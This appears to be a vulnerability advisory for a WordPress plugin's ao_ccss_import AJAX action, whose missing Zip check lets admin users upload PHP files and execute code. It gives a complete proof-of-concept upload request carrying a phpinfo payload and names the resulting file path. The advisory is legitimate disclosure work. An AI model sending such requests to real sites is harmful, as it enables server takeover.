The ao_ccss_import AJAX call does not ensure that the file provided is a legitimate Zip file, allowing high privilege users to upload arbitrary files, such as PHP, leading to RCE.
https://drive.google.com/file/d/1siZsDiJsYRCw58Ksram5zBJOVbs-Hio1/view?usp=sharing
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://example.com/wp-admin/options-general.php?page=ao_critcss
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------161325441624547204062709166080
Content-Length: 504
Connection: close
Cookie: [Admin Cookies]
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/zip
<?php phpinfo() ?>
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="action"
ao_ccss_import
-----------------------------161325441624547204062709166080
Content-Disposition: form-data; name="ao_ccss_import_nonce"
6df2d6b321
-----------------------------161325441624547204062709166080--
Even if the request generates an error 500 (for example when PHP ZipArchive is not installed), file will be at /wp-content/uploads/ao_ccss/rce.php